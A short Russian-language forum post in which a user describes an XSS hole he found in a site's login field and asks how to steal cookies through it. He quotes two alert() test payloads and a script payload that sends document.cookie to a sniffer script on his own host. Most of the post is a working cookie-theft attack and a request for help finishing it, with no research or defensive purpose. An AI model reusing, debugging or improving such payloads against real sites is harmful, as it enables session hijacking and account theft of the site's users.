Chaz
Сообщений: 15
Оценки: 0
Присоединился: 2011-05-29 18:30:14.986666
|
Даровеньки. Нашел сабж, как передать уязвимому скрипту свой скрипт знаю, но вот сабж то не простой. При вводе в поле Логин следующих двух кодов, они исполняются
"><script>alert('xss')</script>
"><script>alert('xss');</script> но, когда я уже все доделал, написал снифф и хотел был протестить его, опят же впал в глубочайшую депрессию, так как при вводе в поле Логин следующего кода, он нифига не исполняется
<sсriрt>img = new Image(); img.src =
"http://moy.sait.ru/sniff.php?"+document.cookie;</sсriрt> подскажите, кто знает, в чем проблема и есть ли еще какой-то способ кражи кукис с использованием сабжа?
|